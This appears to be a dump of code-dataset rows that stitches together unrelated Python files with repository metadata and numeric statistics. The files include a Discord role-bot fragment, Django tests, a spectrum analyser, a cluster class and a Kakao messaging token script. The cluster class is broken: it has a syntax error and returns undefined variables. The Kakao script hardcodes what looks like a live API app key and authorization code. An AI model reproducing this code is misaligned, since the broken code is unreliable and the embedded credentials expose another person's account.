await ctx.author.add_roles(r)
except:
pass
await ctx.message.add_reaction('✅') # white check mark
@commands.command(no_pm=True, cooldown_after_parsing=True, aliases=['iamn'])
@isAuthorized()
@commands.cooldown(1, 1, commands.BucketType.user)
async def iamnot(self, ctx, *, role_name : str):
"""Remove a role to you that you choose. Role must be on a list of self-assignable roles."""
g = str(ctx.guild.id)
roles = self.bot.assignablerole.get(g, {})
if role_name.lower() not in roles:
await ctx.message.add_reaction('❎') # negative check mark
else:
id = roles[role_name.lower()]
r = ctx.guild.get_role(id)
if r is None: # role doesn't exist anymore
await ctx.message.add_reaction('❎') # negative check mark
self.bot.assignablerole[g].pop(role_name.lower())
if len(self.bot.assignablerole[g]) == 0:
self.bot.assignablerole.pop(g)
self.bot.savePending = True
else:
try:
await ctx.author.remove_roles(r)
except:
pass
await ctx.message.add_reaction('✅') # white check mark
@commands.command(no_pm=True, cooldown_after_parsing=True)
@isAuthorized()
@commands.cooldown(1, 5, commands.BucketType.guild)
async def lsar(self, ctx, page : int = 1):
"""List the self-assignable roles available in this server"""
g = str(ctx.guild.id)
if page < 1: page = 1
roles = self.bot.assignablerole.get(str(ctx.guild.id), {})
if len(roles) == 0:
await ctx.send(embed=self.bot.buildEmbed(title="Error", description="No self assignable roles available on this server", color=self.color))
return
if (page -1) >= len(roles) // 20:
page = ((len(roles) - 1) // 20) + 1
fields = []
count = 0
for k in list(roles.keys()):
if count < (page - 1) * 20:
count += 1
continue
if count >= page * 20:
break
if count % 10 == 0:
fields.append({'name':'{} '.format(self.bot.getEmote(str(len(fields)+1))), 'value':'', 'inline':True})
r = ctx.guild.get_role(roles[k])
if r is not None:
fields[-1]['value'] += '{}\n'.format(k)
else:
self.bot.assignablerole[str(ctx.guild.id)].pop(k)
self.bot.savePending = True
count += 1
await ctx.send(embed=self.bot.buildEmbed(title="Self Assignable Roles", fields=fields, footer="Page {}/{}".format(page, 1+len(roles)//20), color=self.color)) | 48.701923 | 226 | 0.536387 | 3,005 | 25,325 | 4.496506 | 0.148419 | 0.042481 | 0.026939 | 0.033156 | 0.499556 | 0.425844 | 0.406306 | 0.385509 | 0.360938 | 0.31831 | 0 | 0.016099 | 0.320592 | 25,325 | 520 | 227 | 48.701923 | 0.767814 | 0.019151 | 0 | 0.35307 | 0 | 0 | 0.107546 | 0.001611 | 0 | 0 | 0.000348 | 0 | 0 | 0 | null | null | 0.006579 | 0.017544 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57cf71e94609fd85e48613dd288c7fef9e5aa2fe | 2,260 | py | Python | nicos_ess/labs/chop_embla/setups/skf_chopper.py | jkrueger1/nicos | 5f4ce66c312dedd78995f9d91e8a6e3c891b262b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 12 | 2019-11-06T15:40:36.000Z | 2022-01-01T16:23:00.000Z | nicos_ess/labs/chop_embla/setups/skf_chopper.py | jkrueger1/nicos | 5f4ce66c312dedd78995f9d91e8a6e3c891b262b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 91 | 2020-08-18T09:20:26.000Z | 2022-02-01T11:07:14.000Z | nicos_ess/labs/chop_embla/setups/skf_chopper.py | jkrueger1/nicos | 5f4ce66c312dedd78995f9d91e8a6e3c891b262b | [
"CC-BY-3.0",
"Apache-2.0",
"CC-BY-4.0"
] | 6 | 2020-01-11T10:52:30.000Z | 2022-02-25T12:35:23.000Z | description = 'Some kind of SKF chopper'
pv_root = 'LabS-Embla:Chop-Drv-0601:'
devices = dict(
skf_drive_temp=device('nicos.devices.epics.pva.EpicsReadable',
description='Drive temperature',
readpv='{}DrvTmp_Stat'.format(pv_root),
monitor=True,
),
skf_motor_temp=device('nicos.devices.epics.pva.EpicsReadable',
description='Motor temperature',
readpv='{}MtrTmp_Stat'.format(pv_root),
monitor=True,
),
skf_pos_v13=device('nicos.devices.epics.pva.EpicsReadable',
description='Position',
readpv='{}PosV13_Stat'.format(pv_root),
monitor=True,
),
skf_pos_v24=device('nicos.devices.epics.pva.EpicsReadable',
description='Position',
readpv='{}PosV24_Stat'.format(pv_root),
monitor=True,
),
skf_pos_w13=device('nicos.devices.epics.pva.EpicsReadable',
description='Position',
readpv='{}PosW13_Stat'.format(pv_root),
monitor=True,
),
skf_pos_w24=device('nicos.devices.epics.pva.EpicsReadable',
description='Position',
readpv='{}PosW24_Stat'.format(pv_root),
monitor=True,
),
skf_pos_Z12=device('nicos.devices.epics.pva.EpicsReadable',
description='Position',
readpv='{}PosZ12_Stat'.format(pv_root),
monitor=True,
),
skf_status=device('nicos.devices.epics.pva.EpicsStringReadable',
description='The chopper status.',
readpv='{}Chop_Stat'.format(pv_root),
monitor=True,
),
skf_control=device('nicos.devices.epics.pva.EpicsMappedMoveable',
description='Used to start and stop the chopper.',
readpv='{}Cmd'.format(pv_root),
writepv='{}Cmd'.format(pv_root),
requires={'level': 'user'},
mapping={'Clear chopper': 8,
'Start chopper': 6,
'Async start': 5,
'Stop chopper': 3,
'Reset chopper': 1,
},
),
skf_speed=device('nicos.devices.epics.pva.EpicsAnalogMoveable',
description='The current speed.',
requires={'level': 'user'},
readpv='{}Spd_Stat'.format(pv_root),
writepv='{}Spd_SP'.format(pv_root),
abslimits=(0.0, 77),
monitor=True,
),
)
| 33.731343 | 69 | 0.611504 | 248 | 2,260 | 5.41129 | 0.302419 | 0.058122 | 0.107303 | 0.171386 | 0.567064 | 0.508942 | 0.508942 | 0.441878 | 0.23845 | 0 | 0 | 0.019153 | 0.237611 | 2,260 | 66 | 70 | 34.242424 | 0.759721 | 0 | 0 | 0.40625 | 0 | 0 | 0.350885 | 0.182743 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57cfe9cbd14de3c1d66f6b0d1a90693c4bb4239e | 1,623 | py | Python | chapter_08/05_alphabetic_tel_number.py | SergeHall/Tony-Gaddis-Python-4th | 24e7c70fbd196ff531a5e4e7f6f5021c4b4177ba | [
"MIT"
] | 2 | 2021-04-07T03:26:37.000Z | 2021-07-26T07:38:49.000Z | chapter_08/05_alphabetic_tel_number.py | SergeHall/Tony-Gaddis-Python-4th | 24e7c70fbd196ff531a5e4e7f6f5021c4b4177ba | [
"MIT"
] | null | null | null | chapter_08/05_alphabetic_tel_number.py | SergeHall/Tony-Gaddis-Python-4th | 24e7c70fbd196ff531a5e4e7f6f5021c4b4177ba | [
"MIT"
] | null | null | null | # # 5. Алфавитный переводчик номера телефона. Многие компании используют телефонные
# # номера наподобие 555-GET-FOOD, чтобы клиентам было легче запоминать эти номера.
# # На стандартном телефоне буквам алфавита поставлены в соответствие числа следующим
# # образом: А,В и С=2 ; D,Е и F=З. phone_num = input('nnn-XXX-XXXX. Где n-
# цифра, X - буквы: ')
def main():
print("'x' can be either a letter or a number.")
phone_num = input('Enter a phone number in the format xxx-xxx-xxxx: ')
print(phone_num)
print("Phone number alphabet:", phone_num)
print("Phone number: ", end="")
print_number_alphabet(phone_num)
def print_number_alphabet(num_phone):
for ch in num_phone:
if ch.islower():
ch = ch.upper()
if ch.isdigit():
print(ch, end='')
elif ch == '-':
print('-', end='')
elif ch == 'A' or ch == 'B' or ch == 'C':
print('2', end='')
elif ch == 'D' or ch == 'E' or ch == 'F':
print('3', end='')
elif ch == 'G' or ch == 'H' or ch == 'I':
print('4', end='')
elif ch == 'J' or ch == 'K' or ch == 'L' \
or ch == 'V':
print('5', end='')
elif ch == 'M' or ch == 'N' or ch == 'O' \
or ch == 'U':
print('6', end='')
elif ch == 'P' or ch == 'Q' or ch == 'R' \
or ch == 'S' or ch == 'T':
print('7', end='')
elif ch == 'W' or ch == 'X' or ch == 'Y' \
or ch == 'Z':
print('8', end='')
else:
print('-', end='')
main()
| 33.122449 | 85 | 0.479359 | 226 | 1,623 | 3.393805 | 0.438053 | 0.099087 | 0.093872 | 0.046936 | 0.062581 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011225 | 0.341343 | 1,623 | 48 | 86 | 33.8125 | 0.706268 | 0.20764 | 0 | 0.055556 | 0 | 0 | 0.125687 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0 | 0 | 0.055556 | 0.444444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
57d3a9d76e06f373164b6aa991f8a00afed0d016 | 530 | py | Python | carton/tests/urls.py | knyazz/py3-django-enriched-carton | 27d97388d8153f29a3c629cdcd3e734ad09dc52e | [
"MIT"
] | null | null | null | carton/tests/urls.py | knyazz/py3-django-enriched-carton | 27d97388d8153f29a3c629cdcd3e734ad09dc52e | [
"MIT"
] | null | null | null | carton/tests/urls.py | knyazz/py3-django-enriched-carton | 27d97388d8153f29a3c629cdcd3e734ad09dc52e | [
"MIT"
] | null | null | null | from django.conf.urls import url
from .views import (
add,
clear,
remove,
remove_single,
set_quantity,
show
)
urlpatterns = [
url(r'^show/$', show, name='carton-tests-show'),
url(r'^add/$', add, name='carton-tests-add'),
url(r'^remove/$', remove, name='carton-tests-remove'),
url(r'^remove-single/$', remove_single, name='carton-tests-remove-single'),
url(r'^clear/$', clear, name='carton-tests-clear'),
url(r'^set-quantity/$', set_quantity, name='carton-tests-set-quantity'),
]
| 25.238095 | 79 | 0.632075 | 72 | 530 | 4.597222 | 0.263889 | 0.072508 | 0.271903 | 0.126888 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166038 | 530 | 20 | 80 | 26.5 | 0.748869 | 0 | 0 | 0 | 0 | 0 | 0.343396 | 0.096226 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57d50f67e3d06852292f8ffe636f692eff8d51a1 | 4,798 | py | Python | spectrumanalyzer.py | cwolfe007/LEDSoundResponsiveSuit | 86c03e80a7b689e418629e4d11674299d0cad64b | [
"MIT"
] | null | null | null | spectrumanalyzer.py | cwolfe007/LEDSoundResponsiveSuit | 86c03e80a7b689e418629e4d11674299d0cad64b | [
"MIT"
] | 1 | 2019-05-05T03:13:11.000Z | 2019-05-05T03:13:11.000Z | spectrumanalyzer.py | cwolfe007/LEDSoundRepsponsiveSuit | 86c03e80a7b689e418629e4d11674299d0cad64b | [
"MIT"
] | null | null | null |
# Spectrum Analyzer Code Author: Caleb Wolfe
import time
import Adafruit_GPIO.SPI as SPI
import Adafruit_MCP3008
import numpy as np
class SpectrumAnalyzer:
def __init__(self,smprate=44100,senistivity=100.0,samplesize=1024):
self.__samplerate =smprate
self.__peaksample = senistivity
self.__samplesArraySize = samplesize #sample size for the audio batch to be analyzed
self.__buckets = []
# Hardware SPI configuration:
SPI_PORT = 0
SPI_DEVICE = 0
spid = SPI.SpiDev(SPI_PORT, SPI_DEVICE)
spid.set_clock_hz(self.__samplerate)
self.__mcp = Adafruit_MCP3008.MCP3008(spi=spid)
def __calculate_levels(self,inputarray):
darray = np.array(inputarray, dtype='float')
fourier=np.fft.rfft(darray) #apply discrete FFT
fftusable= fourier[:self.__samplesArraySize-1] #Remove items past Nyquist limit
power = np.abs(fftusable) #convert the complex numbers to real numbers
nyqquistadjustment= (power*2)/ (1024*self.__samplesArraySize) #Adjust the values to find actual amplitude (1024 is the max range of voltage)
result = nyqquistadjustment
self.__fft = result
def __readmicval(self):
value = self.__mcp.read_adc(0)
return value
def __getvals(self):
subbassbucket = []
bassbucketlow = []
bassbuckethigh = []
lowmid1bucket = []
lowmid2bucket = []
lowmid3bucket = []
lowmid4bucket = []
mid1bucket = []
mid2bucket = []
mid3bucket = []
mid4bucket = []
midbuckethigh = []
highbucketlow = []
highbuckethigh = []
amps = []
currentpos = 0
#find the values of the amplitudes to each bucket
for a in self.__fft: #append amplitudes to buckets
amp = a * 10000 # make values more managable (Lower decible setting, changed to 10000 for experimentaion with quieter db levels
frq = self.__freqarray[currentpos] # get the current frequency
#
if (amp > self.__peaksample): #this applies senistivity levels to ignor non signifigant amplitudes
if (frq > 20 and frq < 60): # and p in range(0,3) :
amp = (amp+50)%256
subbassbucket.append(amp)
elif (frq >= 60 and frq < 155): # and p in range(3,5):
bassbucketlow.append(amp)
elif (frq >= 155 and frq < 250):
bassbuckethigh.append(amp)
elif (frq >= 250 and frq < 313):
lowmid1bucket.append(amp)
elif (frq >= 313 and frq < 376): # and p in range(5,9):
lowmid2bucket.append(amp)
elif (frq >= 376 and frq < 439): # and p in range(5,9):
lowmid3bucket.append(amp)
elif (frq >= 439 and frq < 500): # and p in range(5,9):
lowmid4bucket.append(amp)
elif (frq >= 500 and frq < 875):
mid1bucket.append(amp)
elif frq >= 875 and frq < 1250:
mid2bucket.append(amp)
elif (frq >= 1250 and frq < 1625): # and p in range(9,12):
mid3bucket.append(amp)
elif (frq >= 1625 and frq < 2000): # and p in range(9,12):
mid4bucket.append(amp)
elif (frq >= 2000 and frq < 3000): #and p in range(12,15):
highbucketlow.append(amp)
elif (frq >= 3000 and frq < 4000): #and p in range(12,15):
highbuckethigh.append(amp)
currentpos += 1
self.__buckets = [np.mean(subbassbucket),np.mean(bassbucketlow),np.mean(bassbuckethigh),np.mean(lowmid1bucket),np.mean(lowmid2bucket),np.mean(lowmid3bucket),np.mean(lowmid4bucket),np.mean(mid1bucket),np.mean(mid2bucket),np.mean(mid3bucket),np.mean(mid4bucket),np.mean(highbucketlow),np.mean(highbuckethigh) ]
def getSpectrumBuckets(self):
return self.__buckets
def analyzeSpectrum(self):
tic = time.clock()
data = [self.__readmicval() for x in range(self.__samplesArraySize)]
toc = time.clock()
fft = self.__calculate_levels(data)
processtime = toc-tic
stimestep = processtime /self.__samplesArraySize #average step time
self.__freqarray = np.fft.fftfreq(self.__samplesArraySize,stimestep) #get freq steps
self.__getvals()
print('Reading MCP3008 values, press Ctrl-C to quit...')
| 35.279412 | 316 | 0.563568 | 515 | 4,798 | 5.12233 | 0.357282 | 0.029568 | 0.059136 | 0.072782 | 0.03677 | 0.03677 | 0 | 0 | 0 | 0 | 0 | 0.060693 | 0.344102 | 4,798 | 135 | 317 | 35.540741 | 0.777566 | 0.167361 | 0 | 0 | 0 | 0 | 0.013108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.045455 | null | null | 0.011364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57d96e1c007274d36d8529dbd1130a23bc0cd5c7 | 3,093 | py | Python | accounts/tests/test_views.py | jhonatanlteodoro/ecommerce-django | 931c70bba7658cdb982e5294e02c2b90d02b8c82 | [
"MIT"
] | 1 | 2020-01-07T20:50:48.000Z | 2020-01-07T20:50:48.000Z | accounts/tests/test_views.py | jhonatanlteodoro/ecommerce-django | 931c70bba7658cdb982e5294e02c2b90d02b8c82 | [
"MIT"
] | null | null | null | accounts/tests/test_views.py | jhonatanlteodoro/ecommerce-django | 931c70bba7658cdb982e5294e02c2b90d02b8c82 | [
"MIT"
] | null | null | null | from django.test import Client
from django.test import TestCase
from django.urls import reverse
from django.contrib.auth import get_user_model
from model_mommy import mommy
from django.conf import settings
User = get_user_model()
class RegisterViewTestCase(TestCase):
def setUp(self):
self.client = Client()
self.register_url = reverse('accounts:register')
def test_register_ok(self):
data = {
'username': 'jhowuserteste', 'email': 'uhuuu@gmail.com',
'password1': 'teste123','password2': 'teste123',
}
response = self.client.post(self.register_url, data)
login_url = reverse('login')
self.assertRedirects(response, login_url)
self.assertEquals(User.objects.count(), 1)
def test_register_fail(self):
data = {
'username': 'jhowuserteste', 'password1': 'teste123',
'password2': 'teste123',
}
response = self.client.post(self.register_url, data)
self.assertFormError(response, 'form', 'email', 'Este campo é obrigatório.')
class UpdateUserTestCase(TestCase):
def setUp(self):
self.client = Client()
self.url = reverse('accounts:update_user')
self.user = mommy.prepare(settings.AUTH_USER_MODEL)
self.user.set_password('123')
self.user.save()
def tearDown(self):
self.user.delete()
def test_update_user_ok(self):
data = {'name': 'humbree', 'email':'jovem@gmail.com'}
response = self.client.get(self.url)
self.assertEquals(response.status_code, 302)
self.client.login(username=self.user.username, password='123')
response = self.client.post(self.url, data)
accounst_index_url = reverse('accounts:index')
self.assertRedirects(response, accounst_index_url)
#user = User.objects.get(username=self.user.username)
self.user.refresh_from_db()
self.assertEquals(self.user.email, 'jovem@gmail.com')
self.assertEquals(self.user.name, 'humbree')
def test_update_user_error(self):
data = {}
self.client.login(username=self.user.username, password='123')
response = self.client.post(self.url, data)
self.assertFormError(response, 'form', 'email', 'Este campo é obrigatório.')
class UpdatePasswordTestCase(TestCase):
def setUp(self):
self.client = Client()
self.url = reverse('accounts:update_password')
self.user = mommy.prepare(settings.AUTH_USER_MODEL)
self.user.set_password('123')
self.user.save()
def tearDown(self):
self.user.delete()
def test_update_password_ok(self):
data = {
'old_password': '123', 'new_password1':'teste1234',
'new_password2':'teste1234',
}
self.client.login(username=self.user.username, password='123')
response = self.client.post(self.url, data)
self.user.refresh_from_db()
#user = User.objects.get(username=self.user.username)
self.assertTrue(self.user.check_password('teste1234'))
| 34.366667 | 84 | 0.648885 | 358 | 3,093 | 5.48324 | 0.212291 | 0.073357 | 0.055018 | 0.056037 | 0.537443 | 0.520122 | 0.520122 | 0.520122 | 0.499745 | 0.452878 | 0 | 0.02164 | 0.223084 | 3,093 | 89 | 85 | 34.752809 | 0.795256 | 0.033624 | 0 | 0.442857 | 0 | 0 | 0.138601 | 0.008035 | 0 | 0 | 0 | 0 | 0.128571 | 1 | 0.142857 | false | 0.2 | 0.085714 | 0 | 0.271429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
57e0f15da3397b04339d70c34758b935f92d1d00 | 3,339 | py | Python | lattice_gauge_theory/cluster.py | saforem2/lattice_gauge_theory | 600ce4d7d520c5b54a49b6c13086e577704b38ec | [
"MIT"
] | 4 | 2019-01-04T04:59:35.000Z | 2021-08-24T16:38:16.000Z | lattice_gauge_theory/cluster.py | saforem2/lattice_gauge_theory | 600ce4d7d520c5b54a49b6c13086e577704b38ec | [
"MIT"
] | null | null | null | lattice_gauge_theory/cluster.py | saforem2/lattice_gauge_theory | 600ce4d7d520c5b54a49b6c13086e577704b38ec | [
"MIT"
] | 2 | 2018-12-13T10:49:36.000Z | 2020-11-17T15:42:35.000Z | class Cluster(object):
""" Object for grouping sets of sites. """
def __init__(self, sites):
"""
Initialize a cluster instance.
Args:
sites (list(Site)): The list of sites that make up the cluster.
Returns:
None
"""
self.sites = set(sites)
self.neighbors = set()
for s in self.sites:
self.neighbors.update(s.p_neighbors)
self.neighbors = self.neighbors.difference(self.sites)
def merge(self, other_cluster):
"""
Combine two clusters into a single cluster.
Args:
other_cluster (Cluster): The second cluster to combine.
Returns:
(Cluster): The combination of both clusters.
"""
new_cluster = Cluster(self.sites | other_cluster.sites)
new_cluster.neighbors = (
self.neighbors | other_cluster.neighbors).difference(
new_cluster.sites
)
)
return new_cluster
def is_neighboring(self, other_cluster):
"""
Logical check whether the neighbor list for cluster A includes any site
in cluster B
Args:
other_cluster (Cluster): The other cluster we are testing for
neighbor connectivity.
Returns:
bool: True if the other cluster neighbors this cluster.
"""
return bool(self.neighbors & other_cluster.sites)
def size(self):
"""
Number of sites in this cluster.
Args:
None
Returns:
None
"""
return len(self.sites)
def sites_at_edges(self):
"""
Finds the six sites with the max and min coordinates along x, y, and z.
Args:
None
Returns:
list(list): In the order [+x, -x, +y, -y, +z, -z]
"""
min_x = min([s.r[0] for s in self.sites])
max_x = max([s.r[0] for s in self.sites])
min_y = min([s.r[1] for s in self.sites])
max_y = max([s.r[1] for s in self.sites])
min_z = min([s.r[2] for s in self.sites])
max_z = max([s.r[2] for s in self.sites])
x_max = [s for s in self.sites if s.r[0] == min_x]
x_min = [s for s in self.sites if s.r[0] == max_x]
y_max = [s for s in self.sites if s.r[1] == min_y]
y_min = [s for s in self.sites if s.r[1] == max_y]
x_max = [s for s in self.sites if s.r[2] == min_z]
x_min = [s for s in self.sites if s.r[2] == max_z]
return (x_max, x_min, y_max, y_min, z_max, z_min)
def is_periodically_contiguous(self):
"""
Logical check whether a cluster connects with itself across the
periodic boundary.
Args:
None
Returns:
(bool, bool, bool): Contiguity along the x, y, and z coordinates.
"""
edges = self.sites_at_edges()
is_contiguous = [False, False, False]
along_x = any(
[s2 in s1.p_neighbors for s1 in edges[0] for s2 in edges[1]]
)
along_y = any(
[s2 in s1.p_neighbors for s1 in edges[2] for s2 in edges[3]]
)
along_z = any(
[s2 in s1.p_neighbors for s1 in edges[4] for s2 in edges[5]]
)
return (along_x, along_y, along_z)
| 29.289474 | 79 | 0.542677 | 475 | 3,339 | 3.694737 | 0.2 | 0.097436 | 0.044444 | 0.074074 | 0.245584 | 0.207407 | 0.19886 | 0.19886 | 0.137322 | 0.137322 | 0 | 0.013966 | 0.356694 | 3,339 | 113 | 80 | 29.548673 | 0.803073 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
57eb7325fe9ef8d6594ce7350e80b8d6714ba595 | 3,094 | py | Python | icbd/type_analyzer/tests/parametric.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | 7 | 2015-04-06T15:17:13.000Z | 2020-10-21T04:57:00.000Z | icbd/type_analyzer/tests/parametric.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | null | null | null | icbd/type_analyzer/tests/parametric.py | kmod/icbd | 9636564eb3993afa07c6220d589bbd1991923d74 | [
"MIT"
] | 4 | 2016-05-16T17:53:08.000Z | 2020-11-28T17:18:50.000Z | import collections
def unknown():
raise Exception()
l = [1] # 0 [<int|str>]
l.append(2) # 0 [<int|str>] # 2 (<int|str>) -> None
l.append('')
l[0] = 1
l[0] = ""
l2 = list(l) # 0 [<int|str>]
l2 = sorted(l) # 0 [<int|str>]
x = collections.deque(l2).pop() # 0 <int|str>
l2 = reversed(l) # 0 iterator of <int|str>
l2 = {1:l}[1] # 0 [<int|str>]
l2 = {'':l}[1] # 0 [<int|str>] # e 5
l2 = (l, l)[0] # 0 [<int|str>]
l = range(5)
l2 = list(l) # 0 [int]
l2 = sorted(l) # 0 [int]
x = collections.deque(l2).pop() # 0 int
l2 = reversed(l) # 0 iterator of int
l2 = {1:l}[1] # 0 [int]
l2 = {'':l}[1] # 0 [int] # e 5
l2 = (l, l)[0] # 0 [int]
d = dict([(1,2), (3,4)]) # 0 {int:int}
d = dict([]) # 0 {<unknown>:<unknown>}
d = dict([1]) # 0 <unknown> # e 4
d = dict(1) # 0 <unknown> # e 4
d = dict(unknown()) # 0 {<unknown>:<unknown>}
d = dict({1:''}) # 0 {int:str}
d = dict(a=1) # 0 {str:int}
l = range(3) # 0 [<int|object>]
l.extend([object()])
s = set() # 0 set(int)
s.add(2) # 0 set(int) # 2 (int) -> None
s = set() # 0 set(<unknown>)
s = set(2) # e 4 # 0 set(<unknown>)
s = set('') # 0 set(str)
l = []
l[''] = 1 # e 0
def f(x): # 4 (int) -> str
return ''*x
l1 = range(2) # 0 [int]
l2 = map(f, l1) # 0 [str]
s1 = "abc123" # 0 str
# filter special cases strings...
s2 = filter(str.isalpha, s1) # 0 str
s3 = ''.join(s2) # 0 str
s4 = filter(str.isalpha, [s1]) # 0 [str]
d = {1:2} # 0 {int:int}
d2 = d.copy() # 0 {<int|str>:<bool|int>}
d2[''] = True # 0 {<int|str>:<bool|int>}
d = {1:''} # 0 {int:str}
t = d.popitem() # 0 (int,str)
d.clear()
d = {1:2} # 0 {int:<int|str>}
x = d.setdefault(2, '') # 0 <int|str>
d = {1:2} # 0 {int:int}
x = d.get(2, '') # 0 <int|str>
s = set([1,2]) # 0 set(int)
s2 = s.difference(['']) # 0 set(int)
s = set([1,2]) # 0 set(int)
s2 = s.difference_update(['']) # 0 None
s = set([1, 2])
x = s.pop() # 0 int
s.remove('') # e 0
s.remove(0)
s = set([1, 2]) # 0 set(int)
l = ["a"] # 0 [str]
s2 = s.symmetric_difference(l) # 0 set(<int|str>)
s = set([1, 2]) # 0 set(<int|str>)
l = ["a"] # 0 [str]
s2 = s.symmetric_difference_update(l) # 0 None
s = set([1, 2]) # 0 set(int)
l = ["a"] # 0 [str]
s2 = s.union(l) # 0 set(<int|str>)
s = set([1, 2]) # 0 set(<int|str>)
l = ["a"] # 0 [str]
s2 = s.update(l) # 0 None
t1 = (1,) # 0 (int,)
t2 = ('',) # 0 (str,)
t3 = t1 + t2 # 0 (int,str)
s = set([''])
s.issubset([1]) # e 0
s.issuperset([1]) # e 0
s = set(['', 1])
s.issubset([1]) # e 0
s.issuperset([1])
s = set([1])
s.issubset([1, ''])
s.issuperset([1, '']) # e 0
def f9():
r = range(5) # 4 [int]
f = map(float, r) # 4 [float]
m = max(f) # 4 float
def f(x, y): # 8 (str,int) -> [str]
return [x] * y
l = map(f, "aoeu", range(4)) # 4 [[str]]
def f10():
def is_divisible(x, k): # 8 (int,int) -> bool
return (x%k) == 0
l = filter(lambda x:is_divisible(x, 3), range(100)) # 4 [int]
l2 = filter(None, range(10)) # 4 [int]
print l2
l3 = filter(None, "") # 4 str
l4 = filter(None, [""]) # 4 [str]
if 1:
l = ''
else:
l = [1]
l5 = filter(None, l) # 4 <[int]|str> # 22 <[int]|str>
| 21.486111 | 65 | 0.486102 | 589 | 3,094 | 2.543294 | 0.156197 | 0.080107 | 0.074766 | 0.037383 | 0.503338 | 0.393191 | 0.323097 | 0.212951 | 0.140854 | 0.11215 | 0 | 0.089134 | 0.238526 | 3,094 | 143 | 66 | 21.636364 | 0.546689 | 0.341306 | 0 | 0.330275 | 0 | 0 | 0.007194 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.009174 | null | null | 0.009174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
17b5722e5e60de2426f1160b8b162178106fdd0c | 890 | py | Python | kakao_message_utils/request_token.py | hahagarden/project_news_summarize | 1c47e2ec30cff715a0c56b20f50a9ffa53ded274 | [
"MIT"
] | null | null | null | kakao_message_utils/request_token.py | hahagarden/project_news_summarize | 1c47e2ec30cff715a0c56b20f50a9ffa53ded274 | [
"MIT"
] | null | null | null | kakao_message_utils/request_token.py | hahagarden/project_news_summarize | 1c47e2ec30cff715a0c56b20f50a9ffa53ded274 | [
"MIT"
] | null | null | null | import token_def
# To get Authorization Code
# https://kauth.kakao.com/oauth/authorize?client_id=cc335daa766cc74b3de1b1c372a6cce8&response_type=code&redirect_uri=https://localhost.com
KAKAO_APP_KEY = "cc335daa766cc74b3de1b1c372a6cce8" # REST_API app key
AUTHORIZATION_CODE = "flzXSvhelQ3LLzmAKyo5-bQsafEyGOyFAMyK4N-dTii5B-SxG3-KimikA5vq0zD1ChZ_jQo9dVsAAAF8OjRb-g" # once in a run
KAKAO_TOKEN_FILENAME = "/Users/jeongwon/Documents/GitHub/project_news_summarize/json/kakao_token.json" # Token in this file(.json)
# To get Access Token
tokens = token_def.request_tokens(KAKAO_APP_KEY, AUTHORIZATION_CODE)
# To save Access Token in the file(.json)
token_def.save_tokens(KAKAO_TOKEN_FILENAME, tokens)
# # To update Refresh Token after the Access Token is expired
# tokens=token_def.update_tokens(KAKAO_APP_KEY, KAKAO_TOKEN_FILENAME)
# token_def.save_tokens(KAKAO_TOKEN_FILENAME, tokens)
